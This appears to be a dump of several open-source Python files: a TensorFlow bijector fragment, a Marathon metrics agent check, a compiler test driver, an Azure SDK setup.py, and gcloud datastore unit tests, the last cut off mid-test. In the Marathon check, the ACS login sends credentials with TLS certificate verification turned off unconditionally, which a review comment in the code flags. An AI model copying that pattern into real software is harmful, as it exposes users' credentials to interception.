          validate_args=validate_args,
          name=name)

  def _forward(self, x):
    return math_ops.abs(x)

  def _inverse(self, y):
    # Returns both preimages (-y, y); see the class docstring for the
    # deliberately loose handling of y == 0 and (unvalidated) y < 0.
    if self.validate_args:
      y = control_flow_ops.with_dependencies(
          [check_ops.assert_non_negative(y, message="Argument y was negative")],
          y)
    return -y, y

  def _inverse_log_det_jacobian(self, y):
    # F^{-1}(y) = (-y, y), so DF^{-1}(y) = (-1, 1),
    # so Log|DF^{-1}(y)| = Log[1, 1] = [0, 0].
    batch_shape = array_ops.shape(y)[:array_ops.rank(y) - self.event_ndims]
    zeros = array_ops.zeros(batch_shape, dtype=y.dtype)
    if self.validate_args:
      zeros = control_flow_ops.with_dependencies(
          [check_ops.assert_non_negative(y, message="Argument y was negative")],
          zeros)
    return zeros, zeros

  @property
  def _is_injective(self):
    # Both -y and y map to y, so the bijector is not injective; downstream
    # code must handle the two-branch inverse.
    return False
| apache-2.0 |
StackVista/sts-agent-integrations-core | marathon/check.py | 1 | 8521 |
# stdlib
from urlparse import urljoin
# 3rd party
import requests
# project
from checks import AgentCheck
from config import _is_affirmative
class Marathon(AgentCheck):
    """Agent check collecting app, deployment and queue metrics from a
    Marathon master, optionally authenticating through a DC/OS ACS service.
    """

    DEFAULT_TIMEOUT = 5
    SERVICE_CHECK_NAME = 'marathon.can_connect'
    # Cached ACS auth token; class-level so it survives across check runs.
    ACS_TOKEN = None

    # Numeric fields copied verbatim from each app description.
    APP_METRICS = [
        'backoffFactor',
        'backoffSeconds',
        'cpus',
        'disk',
        'instances',
        'mem',
        'taskRateLimit',
        'tasksRunning',
        'tasksStaged',
        'tasksHealthy',
        'tasksUnhealthy'
    ]

    # Queue metrics: (source attribute, metric suffix) pairs, or a list of
    # such pairs for nested objects.  A None attribute means "use the value
    # of the queue entry itself".
    QUEUE_METRICS = {
        'count': (None, 'count'),
        'delay': ('timeLeftSeconds', 'delay'),
        'processedOffersSummary': [
            ('processedOffersCount', 'offers.processed'),
            ('unusedOffersCount', 'offers.unused'),
            ('rejectSummaryLastOffers', 'offers.reject.last'),
            ('rejectSummaryLaunchAttempt', 'offers.reject.launch'),
        ]
    }

    def check(self, instance):
        """Entry point: validate the instance config and run all collectors."""
        try:
            url, auth, acs_url, ssl_verify, group, instance_tags, timeout = self.get_instance_config(instance)
        except Exception as e:
            self.log.error("Invalid instance configuration.")
            raise e

        self.process_apps(url, timeout, auth, acs_url, ssl_verify, instance_tags, group)
        self.process_deployments(url, timeout, auth, acs_url, ssl_verify, instance_tags)
        self.process_queues(url, timeout, auth, acs_url, ssl_verify, instance_tags)

    def refresh_acs_token(self, auth, acs_url):
        """Fetch a fresh ACS token, cache it on the class and return it.

        Emits a CRITICAL service check and raises when the auth endpoint
        rejects the request.
        """
        try:
            auth_body = {
                'uid': auth[0],
                'password': auth[1]
            }
            # NOTE(review): certificate verification is unconditionally
            # disabled for the ACS login; consider honoring ssl_verify here.
            r = requests.post(urljoin(acs_url, "acs/api/v1/auth/login"), json=auth_body, verify=False)
            r.raise_for_status()
            token = r.json()['token']
            self.ACS_TOKEN = token
            return token
        except requests.exceptions.HTTPError:
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
                               message='acs auth url %s returned a status of %s' % (acs_url, r.status_code),
                               tags = ["url:{0}".format(acs_url)])
            raise Exception("Got %s when hitting %s" % (r.status_code, acs_url))

    def get_json(self, url, timeout, auth, acs_url, verify):
        """GET `url` and return the decoded JSON body.

        Handles ACS token auth (including one retry after a 401), and
        converts request failures into CRITICAL service checks plus raised
        exceptions.  Emits an OK service check on success.
        """
        params = {
            'timeout': timeout,
            'headers': {},
            'auth': auth,
            'verify': verify
        }
        if acs_url:
            # If the ACS token has not been set, go get it.
            if not self.ACS_TOKEN:
                self.refresh_acs_token(auth, acs_url)
            # ACS uses a token header instead of basic auth.
            params['headers']['authorization'] = 'token=%s' % self.ACS_TOKEN
            del params['auth']
        try:
            r = requests.get(url, **params)
            # If we got unauthorized and are using acs auth, the cached
            # token probably expired: refresh it and try once more.
            if r.status_code == 401 and acs_url:
                self.refresh_acs_token(auth, acs_url)
                r = requests.get(url, **params)
            r.raise_for_status()
        except requests.exceptions.Timeout:
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
                               message='%s timed out after %s seconds.' % (url, timeout),
                               tags = ["url:{0}".format(url)])
            raise Exception("Timeout when hitting %s" % url)
        except requests.exceptions.HTTPError:
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
                               message='%s returned a status of %s' % (url, r.status_code),
                               tags = ["url:{0}".format(url)])
            raise Exception("Got %s when hitting %s" % (r.status_code, url))
        except requests.exceptions.ConnectionError:
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
                               message='%s Connection Refused.' % (url),
                               tags = ["url:{0}".format(url)])
            raise Exception("Connection refused when hitting %s" % url)
        else:
            self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
                               tags = ["url:{0}".format(url)])

        return r.json()

    def get_instance_config(self, instance):
        """Extract (url, auth, acs_url, ssl_verify, group, tags, timeout)
        from the instance config, raising when 'url' is missing."""
        if 'url' not in instance:
            raise Exception('Marathon instance missing "url" value.')

        # Load values from the instance config
        url = instance['url']
        user = instance.get('user')
        password = instance.get('password')
        acs_url = instance.get('acs_url')
        if user is not None and password is not None:
            auth = (user, password)
        else:
            auth = None
        ssl_verify = not _is_affirmative(instance.get('disable_ssl_validation', False))
        group = instance.get('group', None)
        tags = instance.get('tags', [])
        default_timeout = self.init_config.get('default_timeout', self.DEFAULT_TIMEOUT)
        timeout = float(instance.get('timeout', default_timeout))
        return url, auth, acs_url, ssl_verify, group, tags, timeout

    def process_apps(self, url, timeout, auth, acs_url, ssl_verify, tags=None, group=None):
        """Collect per-application metrics from /v2/apps (or a group)."""
        if group is None:
            marathon_path = urljoin(url, "v2/apps")
        else:
            marathon_path = urljoin(url, "v2/groups/{}".format(group))
        response = self.get_json(marathon_path, timeout, auth, acs_url, ssl_verify)
        if response is not None:
            self.gauge('marathon.apps', len(response['apps']), tags=tags)
            for app in response['apps']:
                # Build a fresh per-app tag list.  (Rebinding `tags` here, as
                # the code previously did, leaked every earlier app's tags
                # onto all subsequent apps' metrics.)
                app_tags = ['app_id:' + app['id'], 'version:' + app['version']] + (tags or [])
                for attr in self.APP_METRICS:
                    if attr in app:
                        self.gauge('marathon.' + attr, app[attr], tags=app_tags)

    def process_deployments(self, url, timeout, auth, acs_url, ssl_verify, tags=None):
        # Number of running/pending deployments
        response = self.get_json(urljoin(url, "v2/deployments"), timeout, auth, acs_url, ssl_verify)
        if response is not None:
            self.gauge('marathon.deployments', len(response), tags=tags)

    def process_queues(self, url, timeout, auth, acs_url, ssl_verify, tags=None):
        """Collect launch-queue metrics from /v2/queue."""
        QUEUE_PREFIX = 'marathon.queue'
        response = self.get_json(urljoin(url, "v2/queue"), timeout, auth, acs_url, ssl_verify)
        if response is None:
            return

        self.gauge('{}.size'.format(QUEUE_PREFIX), len(response['queue']), tags=tags)
        for queue in response['queue']:
            q_tags = ['app_id:' + queue['app']['id'], 'version:' + queue['app']['version']] + (tags or [])
            for m_type, sub_metric in self.QUEUE_METRICS.iteritems():
                if isinstance(sub_metric, list):
                    # Nested object: pull each configured attribute.
                    for attr, name in sub_metric:
                        try:
                            metric_name = '{}.{}'.format(QUEUE_PREFIX, name)
                            _attr = queue[m_type][attr]
                            if 'Summary' in attr:
                                # Rejection summaries are lists of per-reason
                                # declined/processed counters.
                                for reject in _attr:
                                    reason = reject['reason']
                                    declined = reject['declined']
                                    processed = reject['processed']
                                    summary_tags = q_tags + ['reason:{}'.format(reason)]
                                    self.gauge(metric_name, declined, tags=summary_tags + ['status:declined'])
                                    self.gauge(metric_name, processed, tags=summary_tags + ['status:processed'])
                            else:
                                val = float(_attr)
                                self.gauge(metric_name, val, tags=q_tags)
                        except (KeyError, TypeError):
                            self.log.warn("Metric unavailable skipping: {}".format(metric_name))
                else:
                    try:
                        attr, name = sub_metric
                        metric_name = '{}.{}'.format(QUEUE_PREFIX, name)
                        # attr is None for scalar entries: use the value itself.
                        _attr = queue[m_type][attr] if attr else queue[m_type]
                        val = float(_attr)
                        self.gauge(metric_name, val, tags=q_tags)
                    except (KeyError, TypeError):
                        self.log.warn("Metric unavailable skipping: {}".format(metric_name))
| bsd-3-clause |
LJMNilsson/memtran | src/test_type_checking.py | 1 | 5023 | # Copyright (C) 2017 Martin Nilsson
# This file is part of the Memtran compiler.
#
# The Memtran compiler is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The Memtran compiler is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the Memtran compiler. If not, see http://www.gnu.org/licenses/ .
import util
from tokens import *
import lexer
import ast
import parser
import end_expansion
import name_mangler
import type_collection
import fun_collection # also collects templates, unspecialized
import built_in_functions_stuff
import slot_collection
import type_inference_and_annotation
# Driver script: runs each compiler pass in sequence on typecheckingtest.mtr,
# printing intermediate results.  Each pass only runs when the previous one
# succeeded; a failure simply ends the pipeline without a message of its own
# (the failing pass is expected to have reported the error).
util.currentFileName = "typecheckingtest.mtr"

toks = lexer.lex_file("typecheckingtest.mtr")
if toks != False:
    print("LEXING SUCCESSFUL!")
    # Print the tokens:
    for it in toks:
        it.print_it()
        print(" ", end='')
    print("") # newline
    print("")
    parseResult = parser.parse_program(toks, [])
    if parseResult != None:
        print("PARSING SUCCESSFUL!")
        parseResult.print_it()
        print("") # newline
        print("") # newline
        success = end_expansion.run_pass(parseResult)
        if success:
            print("END EXPANSION SUCCESSFUL!")
            parseResult.print_it()
            print("") # newline
            mangledModuleName = name_mangler.mangle_basic_name("typecheckingtest")
            # TODO: parse and collect module .mh header files here
            directlyImportedTypesDictDict = {}
            otherImportedModulesTypeDictDict = {} # should be a dict of dicts
            directlyImportedFunsDictDict = {} # these two also contain slot declarations, despite the naming -- sorted per directly imported module
            otherImportedModulesFunDictDict = {}
            typeDict = type_collection.gather(parseResult, mangledModuleName, directlyImportedTypesDictDict)
            if not (typeDict == False):
                print("TYPE COLLECTION SUCCESSFUL!")
                print(typeDict)
                success = type_collection.check(typeDict, directlyImportedTypesDictDict, otherImportedModulesTypeDictDict)
                if success:
                    print("NAMED TYPE SIGNATURE CHECKING SUCCESSFUL!")
                    blockNumberList = [] # Initial value. Created by fun_collection pass. To be used again with template specialisation!!! NOTE: ??
                    funDict = fun_collection.run_pass(parseResult, mangledModuleName, blockNumberList, typeDict, directlyImportedTypesDictDict)
                    if not (funDict == False):
                        print("FUNCTION COLLECTION SUCCESSFUL!")
                        for key, value in funDict.items():
                            print(key, end='')
                            print(": ", end='')
                            value.print_it()
                            print("") # newline
                        slotBlockNumberList = [] # should hopefully become the same as 'blockNumberList' as we recurse in the same way...
                        success = slot_collection.run_pass(
                            parseResult, funDict, mangledModuleName, slotBlockNumberList,
                            typeDict, directlyImportedTypesDictDict, otherImportedModulesTypeDictDict,
                            built_in_functions_stuff.builtInFunsDict,
                            directlyImportedFunsDictDict, otherImportedModulesFunDictDict
                        )
                        if success:
                            print("SLOT COLLECTION SUCCESSFUL!")
                            for key, value in funDict.items():
                                print(key, end='')
                                print(": ", end='')
                                value.print_it()
                                print("") # newline
                            success = type_inference_and_annotation.run_pass(
                                parseResult,
                                typeDict, directlyImportedTypesDictDict, otherImportedModulesTypeDictDict,
                                funDict, built_in_functions_stuff.builtInFunsDict, directlyImportedFunsDictDict, otherImportedModulesFunDictDict
                            )
                            if success:
                                print("TYPE CHECKING SUCCESSFUL!")
| gpl-3.0 |
lmazuel/azure-sdk-for-python | azure-mgmt-managementpartner/setup.py | 1 | 2791 | #!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import re
import os.path
from io import open
from setuptools import find_packages, setup
# Azure's custom wheel hook is optional; fall back to plain bdist behavior.
try:
    from azure_bdist_wheel import cmdclass
except ImportError:
    from distutils import log as logger
    logger.warn("Wheel is not available, disabling bdist_wheel hook")
    cmdclass = {}

# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-mgmt-managementpartner"
PACKAGE_PPRINT_NAME = "ManagementPartner Management"

# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')

# azure v0.x is not compatible with this package
# azure v0.x used to have a __version__ attribute (newer versions don't)
try:
    import azure
    try:
        ver = azure.__version__
        raise Exception(
            'This package is incompatible with azure=={}. '.format(ver) +
            'Uninstall it with "pip uninstall azure".'
        )
    except AttributeError:
        pass
except ImportError:
    pass

# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, 'version.py'), 'r') as fd:
    version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]',
                        fd.read(), re.MULTILINE).group(1)

if not version:
    raise RuntimeError('Cannot find version information')

# Long description shown on PyPI is the README plus the changelog.
with open('README.rst', encoding='utf-8') as f:
    readme = f.read()
with open('HISTORY.rst', encoding='utf-8') as f:
    history = f.read()

setup(
    name=PACKAGE_NAME,
    version=version,
    description='Microsoft Azure {} Client Library for Python'.format(PACKAGE_PPRINT_NAME),
    long_description=readme + '\n\n' + history,
    license='MIT License',
    author='Microsoft Corporation',
    author_email='azpysdkhelp@microsoft.com',
    url='https://github.com/Azure/azure-sdk-for-python',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'License :: OSI Approved :: MIT License',
    ],
    zip_safe=False,
    packages=find_packages(exclude=["tests"]),
    install_requires=[
        'msrestazure>=0.4.20,<2.0.0',
        'azure-common~=1.1',
    ],
    cmdclass=cmdclass
)
| mit |
quoclieu/codebrew17-starving | env/lib/python3.5/site-packages/gcloud/datastore/test_client.py | 6 | 34078 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
def _make_entity_pb(project, kind, integer_id, name=None, str_val=None):
    """Build an Entity protobuf with the given key path and, optionally,
    a single string property."""
    from gcloud.datastore._generated import entity_pb2
    from gcloud.datastore.helpers import _new_value_pb

    entity_pb = entity_pb2.Entity()
    entity_pb.key.partition_id.project_id = project
    elem = entity_pb.key.path.add()
    elem.kind = kind
    elem.id = integer_id
    # Only attach a property when both its name and value were given.
    if name is not None and str_val is not None:
        _new_value_pb(entity_pb, name).string_value = str_val
    return entity_pb
class Test__get_gcd_project(unittest2.TestCase):
    # Tests for the helper that reads the project from the GCD_DATASET
    # environment variable.

    def _callFUT(self):
        # "FUT" = function under test; imported lazily so monkey-patching
        # in each test takes effect first.
        from gcloud.datastore.client import _get_gcd_project
        return _get_gcd_project()

    def test_no_value(self):
        import os
        from gcloud._testing import _Monkey

        # With an empty environment the helper must return None.
        environ = {}
        with _Monkey(os, getenv=environ.get):
            project = self._callFUT()
            self.assertEqual(project, None)

    def test_value_set(self):
        import os
        from gcloud._testing import _Monkey
        from gcloud.datastore.client import GCD_DATASET

        # The GCD_DATASET value is returned untouched.
        MOCK_PROJECT = object()
        environ = {GCD_DATASET: MOCK_PROJECT}
        with _Monkey(os, getenv=environ.get):
            project = self._callFUT()
            self.assertEqual(project, MOCK_PROJECT)
class Test__determine_default_project(unittest2.TestCase):
    # Tests for the project-resolution order: explicit argument, then the
    # GCD environment variable, then the base fallback.

    def _callFUT(self, project=None):
        from gcloud.datastore.client import (
            _determine_default_project)
        return _determine_default_project(project=project)

    def _determine_default_helper(self, gcd=None, fallback=None,
                                  project_called=None):
        """Patch both lookup helpers with canned return values and record
        which of them were called (and with what), in order."""
        from gcloud._testing import _Monkey
        from gcloud.datastore import client

        _callers = []

        def gcd_mock():
            _callers.append('gcd_mock')
            return gcd

        def fallback_mock(project=None):
            _callers.append(('fallback_mock', project))
            return fallback

        patched_methods = {
            '_get_gcd_project': gcd_mock,
            '_base_default_project': fallback_mock,
        }

        with _Monkey(client, **patched_methods):
            returned_project = self._callFUT(project_called)

        return returned_project, _callers

    def test_no_value(self):
        # Nothing set anywhere: both helpers consulted, result is None.
        project, callers = self._determine_default_helper()
        self.assertEqual(project, None)
        self.assertEqual(callers, ['gcd_mock', ('fallback_mock', None)])

    def test_explicit(self):
        # An explicit project short-circuits both lookups.
        PROJECT = object()
        project, callers = self._determine_default_helper(
            project_called=PROJECT)
        self.assertEqual(project, PROJECT)
        self.assertEqual(callers, [])

    def test_gcd(self):
        # GCD env value wins before the fallback is ever called.
        PROJECT = object()
        project, callers = self._determine_default_helper(gcd=PROJECT)
        self.assertEqual(project, PROJECT)
        self.assertEqual(callers, ['gcd_mock'])

    def test_fallback(self):
        # Fallback is used only after the GCD lookup returns nothing.
        PROJECT = object()
        project, callers = self._determine_default_helper(fallback=PROJECT)
        self.assertEqual(project, PROJECT)
        self.assertEqual(callers, ['gcd_mock', ('fallback_mock', None)])
class TestClient(unittest2.TestCase):
PROJECT = 'PROJECT'
def setUp(self):
KLASS = self._getTargetClass()
self.original_cnxn_class = KLASS._connection_class
KLASS._connection_class = _MockConnection
def tearDown(self):
KLASS = self._getTargetClass()
KLASS._connection_class = self.original_cnxn_class
def _getTargetClass(self):
from gcloud.datastore.client import Client
return Client
def _makeOne(self, project=PROJECT, namespace=None,
credentials=None, http=None):
return self._getTargetClass()(project=project,
namespace=namespace,
credentials=credentials,
http=http)
def test_ctor_w_project_no_environ(self):
from gcloud._testing import _Monkey
from gcloud.datastore import client as _MUT
# Some environments (e.g. AppVeyor CI) run in GCE, so
# this test would fail artificially.
with _Monkey(_MUT, _base_default_project=lambda project: None):
self.assertRaises(EnvironmentError, self._makeOne, None)
def test_ctor_w_implicit_inputs(self):
from gcloud._testing import _Monkey
from gcloud.datastore import client as _MUT
from gcloud import client as _base_client
OTHER = 'other'
creds = object()
default_called = []
def fallback_mock(project):
default_called.append(project)
return project or OTHER
klass = self._getTargetClass()
with _Monkey(_MUT,
_determine_default_project=fallback_mock):
with _Monkey(_base_client,
get_credentials=lambda: creds):
client = klass()
self.assertEqual(client.project, OTHER)
self.assertEqual(client.namespace, None)
self.assertTrue(isinstance(client.connection, _MockConnection))
self.assertTrue(client.connection.credentials is creds)
self.assertTrue(client.connection.http is None)
self.assertTrue(client.current_batch is None)
self.assertTrue(client.current_transaction is None)
self.assertEqual(default_called, [None])
def test_ctor_w_explicit_inputs(self):
OTHER = 'other'
NAMESPACE = 'namespace'
creds = object()
http = object()
client = self._makeOne(project=OTHER,
namespace=NAMESPACE,
credentials=creds,
http=http)
self.assertEqual(client.project, OTHER)
self.assertEqual(client.namespace, NAMESPACE)
self.assertTrue(isinstance(client.connection, _MockConnection))
self.assertTrue(client.connection.credentials is creds)
self.assertTrue(client.connection.http is http)
self.assertTrue(client.current_batch is None)
self.assertEqual(list(client._batch_stack), [])
def test__push_batch_and__pop_batch(self):
creds = object()
client = self._makeOne(credentials=creds)
batch = client.batch()
xact = client.transaction()
client._push_batch(batch)
self.assertEqual(list(client._batch_stack), [batch])
self.assertTrue(client.current_batch is batch)
self.assertTrue(client.current_transaction is None)
client._push_batch(xact)
self.assertTrue(client.current_batch is xact)
self.assertTrue(client.current_transaction is xact)
# list(_LocalStack) returns in reverse order.
self.assertEqual(list(client._batch_stack), [xact, batch])
self.assertTrue(client._pop_batch() is xact)
self.assertEqual(list(client._batch_stack), [batch])
self.assertTrue(client._pop_batch() is batch)
self.assertEqual(list(client._batch_stack), [])
def test_get_miss(self):
_called_with = []
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return []
creds = object()
client = self._makeOne(credentials=creds)
client.get_multi = _get_multi
key = object()
self.assertTrue(client.get(key) is None)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['keys'], [key])
self.assertTrue(_called_with[0][1]['missing'] is None)
self.assertTrue(_called_with[0][1]['deferred'] is None)
self.assertTrue(_called_with[0][1]['transaction'] is None)
def test_get_hit(self):
TXN_ID = '123'
_called_with = []
_entity = object()
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return [_entity]
creds = object()
client = self._makeOne(credentials=creds)
client.get_multi = _get_multi
key, missing, deferred = object(), [], []
self.assertTrue(client.get(key, missing, deferred, TXN_ID) is _entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['keys'], [key])
self.assertTrue(_called_with[0][1]['missing'] is missing)
self.assertTrue(_called_with[0][1]['deferred'] is deferred)
self.assertEqual(_called_with[0][1]['transaction'], TXN_ID)
def test_get_multi_no_keys(self):
creds = object()
client = self._makeOne(credentials=creds)
results = client.get_multi([])
self.assertEqual(results, [])
def test_get_multi_miss(self):
from gcloud.datastore.key import Key
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result()
key = Key('Kind', 1234, project=self.PROJECT)
results = client.get_multi([key])
self.assertEqual(results, [])
def test_get_multi_miss_w_missing(self):
from gcloud.datastore._generated import entity_pb2
from gcloud.datastore.key import Key
KIND = 'Kind'
ID = 1234
# Make a missing entity pb to be returned from mock backend.
missed = entity_pb2.Entity()
missed.key.partition_id.project_id = self.PROJECT
path_element = missed.key.path.add()
path_element.kind = KIND
path_element.id = ID
creds = object()
client = self._makeOne(credentials=creds)
# Set missing entity on mock connection.
client.connection._add_lookup_result(missing=[missed])
key = Key(KIND, ID, project=self.PROJECT)
missing = []
entities = client.get_multi([key], missing=missing)
self.assertEqual(entities, [])
self.assertEqual([missed.key.to_protobuf() for missed in missing],
[key.to_protobuf()])
def test_get_multi_w_missing_non_empty(self):
from gcloud.datastore.key import Key
creds = object()
client = self._makeOne(credentials=creds)
key = Key('Kind', 1234, project=self.PROJECT)
missing = ['this', 'list', 'is', 'not', 'empty']
self.assertRaises(ValueError, client.get_multi,
[key], missing=missing)
def test_get_multi_w_deferred_non_empty(self):
from gcloud.datastore.key import Key
creds = object()
client = self._makeOne(credentials=creds)
key = Key('Kind', 1234, project=self.PROJECT)
deferred = ['this', 'list', 'is', 'not', 'empty']
self.assertRaises(ValueError, client.get_multi,
[key], deferred=deferred)
def test_get_multi_miss_w_deferred(self):
from gcloud.datastore.key import Key
key = Key('Kind', 1234, project=self.PROJECT)
# Set deferred entity on mock connection.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result(deferred=[key.to_protobuf()])
deferred = []
entities = client.get_multi([key], deferred=deferred)
self.assertEqual(entities, [])
self.assertEqual([def_key.to_protobuf() for def_key in deferred],
[key.to_protobuf()])
def test_get_multi_w_deferred_from_backend_but_not_passed(self):
from gcloud.datastore._generated import entity_pb2
from gcloud.datastore.entity import Entity
from gcloud.datastore.key import Key
key1 = Key('Kind', project=self.PROJECT)
key1_pb = key1.to_protobuf()
key2 = Key('Kind', 2345, project=self.PROJECT)
key2_pb = key2.to_protobuf()
entity1_pb = entity_pb2.Entity()
entity1_pb.key.CopyFrom(key1_pb)
entity2_pb = entity_pb2.Entity()
entity2_pb.key.CopyFrom(key2_pb)
creds = object()
client = self._makeOne(credentials=creds)
# mock up two separate requests
client.connection._add_lookup_result([entity1_pb], deferred=[key2_pb])
client.connection._add_lookup_result([entity2_pb])
missing = []
found = client.get_multi([key1, key2], missing=missing)
self.assertEqual(len(found), 2)
self.assertEqual(len(missing), 0)
# Check the actual contents on the response.
self.assertTrue(isinstance(found[0], Entity))
self.assertEqual(found[0].key.path, key1.path)
self.assertEqual(found[0].key.project, key1.project)
self.assertTrue(isinstance(found[1], Entity))
self.assertEqual(found[1].key.path, key2.path)
self.assertEqual(found[1].key.project, key2.project)
cw = client.connection._lookup_cw
self.assertEqual(len(cw), 2)
ds_id, k_pbs, eventual, tid = cw[0]
self.assertEqual(ds_id, self.PROJECT)
self.assertEqual(len(k_pbs), 2)
self.assertEqual(key1_pb, k_pbs[0])
self.assertEqual(key2_pb, k_pbs[1])
self.assertFalse(eventual)
self.assertTrue(tid is None)
ds_id, k_pbs, eventual, tid = cw[1]
self.assertEqual(ds_id, self.PROJECT)
self.assertEqual(len(k_pbs), 1)
self.assertEqual(key2_pb, k_pbs[0])
self.assertFalse(eventual)
self.assertTrue(tid is None)
def test_get_multi_hit(self):
from gcloud.datastore.key import Key
KIND = 'Kind'
ID = 1234
PATH = [{'kind': KIND, 'id': ID}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, KIND, ID, 'foo', 'Foo')
# Make a connection to return the entity pb.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb])
key = Key(KIND, ID, project=self.PROJECT)
result, = client.get_multi([key])
new_key = result.key
# Check the returned value is as expected.
self.assertFalse(new_key is key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, PATH)
self.assertEqual(list(result), ['foo'])
self.assertEqual(result['foo'], 'Foo')
def test_get_multi_hit_w_transaction(self):
from gcloud.datastore.key import Key
TXN_ID = '123'
KIND = 'Kind'
ID = 1234
PATH = [{'kind': KIND, 'id': ID}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, KIND, ID, 'foo', 'Foo')
# Make a connection to return the entity pb.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb])
key = Key(KIND, ID, project=self.PROJECT)
txn = client.transaction()
txn._id = TXN_ID
result, = client.get_multi([key], transaction=txn)
new_key = result.key
# Check the returned value is as expected.
self.assertFalse(new_key is key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, PATH)
self.assertEqual(list(result), ['foo'])
self.assertEqual(result['foo'], 'Foo')
cw = client.connection._lookup_cw
self.assertEqual(len(cw), 1)
_, _, _, transaction_id = cw[0]
self.assertEqual(transaction_id, TXN_ID)
def test_get_multi_hit_multiple_keys_same_project(self):
from gcloud.datastore.key import Key
KIND = 'Kind'
ID1 = 1234
ID2 = 2345
# Make a found entity pb to be returned from mock backend.
entity_pb1 = _make_entity_pb(self.PROJECT, KIND, ID1)
entity_pb2 = _make_entity_pb(self.PROJECT, KIND, ID2)
# Make a connection to return the entity pbs.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb1, entity_pb2])
key1 = Key(KIND, ID1, project=self.PROJECT)
key2 = Key(KIND, ID2, project=self.PROJECT)
retrieved1, retrieved2 = client.get_multi([key1, key2])
# Check values match.
self.assertEqual(retrieved1.key.path, key1.path)
self.assertEqual(dict(retrieved1), {})
self.assertEqual(retrieved2.key.path, key2.path)
self.assertEqual(dict(retrieved2), {})
def test_get_multi_hit_multiple_keys_different_project(self):
from gcloud.datastore.key import Key
PROJECT1 = 'PROJECT'
PROJECT2 = 'PROJECT-ALT'
# Make sure our IDs are actually different.
self.assertNotEqual(PROJECT1, PROJECT2)
key1 = Key('KIND', 1234, project=PROJECT1)
key2 = Key('KIND', 1234, project=PROJECT2)
creds = object()
client = self._makeOne(credentials=creds)
with self.assertRaises(ValueError):
client.get_multi([key1, key2])
def test_get_multi_max_loops(self):
from gcloud._testing import _Monkey
from gcloud.datastore import client as _MUT
from gcloud.datastore.key import Key
KIND = 'Kind'
ID = 1234
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, KIND, ID, 'foo', 'Foo')
# Make a connection to return the entity pb.
creds = object()
client = self._makeOne(credentials=creds)
client.connection._add_lookup_result([entity_pb])
key = Key(KIND, ID, project=self.PROJECT)
deferred = []
missing = []
with _Monkey(_MUT, _MAX_LOOPS=-1):
result = client.get_multi([key], missing=missing,
deferred=deferred)
# Make sure we have no results, even though the connection has been
# set up as in `test_hit` to return a single result.
self.assertEqual(result, [])
self.assertEqual(missing, [])
self.assertEqual(deferred, [])
def test_put(self):
_called_with = []
def _put_multi(*args, **kw):
_called_with.append((args, kw))
creds = object()
client = self._makeOne(credentials=creds)
client.put_multi = _put_multi
entity = object()
client.put(entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]['entities'], [entity])
def test_put_multi_no_entities(self):
creds = object()
client = self._makeOne(credentials=creds)
self.assertEqual(client.put_multi([]), None)
def test_put_multi_w_single_empty_entity(self):
# https://github.com/GoogleCloudPlatform/gcloud-python/issues/649
from gcloud.datastore.entity import Entity
creds = object()
client = self._makeOne(credentials=creds)
self.assertRaises(ValueError, client.put_multi, Entity())
def test_put_multi_no_batch_w_partial_key(self):
from gcloud.datastore.helpers import _property_tuples
from gcloud.datastore.test_batch import _Entity
from gcloud.datastore.test_batch import _Key
from gcloud.datastore.test_batch import _KeyPB
from gcloud.datastore.test_batch import _mutated_pb
entity = _Entity(foo=u'bar')
key = entity.key = _Key(self.PROJECT)
key._id = None
creds = object()
client = self._makeOne(credentials=creds)
client.connection._commit.append([_KeyPB(key)])
result = client.put_multi([entity])
self.assertTrue(result is None)
self.assertEqual(len(client.connection._commit_cw), 1)
(project,
